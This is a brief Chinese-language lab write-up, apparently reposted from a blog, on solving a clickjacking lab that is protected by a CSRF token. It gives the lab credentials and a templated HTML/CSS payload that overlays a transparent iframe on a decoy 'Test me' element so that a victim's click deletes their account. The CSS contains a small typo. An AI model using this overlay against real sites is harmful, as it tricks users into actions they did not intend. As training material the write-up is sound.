其他分享
首页 > 其他分享> > Lab: Basic clickjacking with CSRF token protection:使用CSRF令牌保护的基本点击劫持

Lab: Basic clickjacking with CSRF token protection:使用CSRF令牌保护的基本点击劫持

作者:互联网

靶场内容:

该实验室包含登录功能和受CSRF 令牌保护的删除帐户按钮。用户将点击诱饵网站上显示“点击”一词的元素。

为了解决这个实验,制作一些 HTML 来构建帐户页面并欺骗用户删除他们的帐户。删除帐号后,实验室就解决了。

您可以使用以下凭据登录自己的帐户: wiener:peter

注意
受害者将使用 Chrome,因此请在该浏览器上测试您的漏洞利用。

靶场解决方法

<style>
   /iframe {
       position:relative;
       width:$width_value;
       height: $height_value;
       opacity: $opacity;
       z-index: 2;
   }
   div {
       position:absolute;
       top:$top_value;
       left:$side_value;
       z-index: 1;
   }
</style>
<div>Test me</div>
<iframe src="$url"></iframe>

标签:me,clickjacking,帐户,单击,top,value,Lab,CSRF,div
来源: https://www.cnblogs.com/Zeker62/p/15177343.html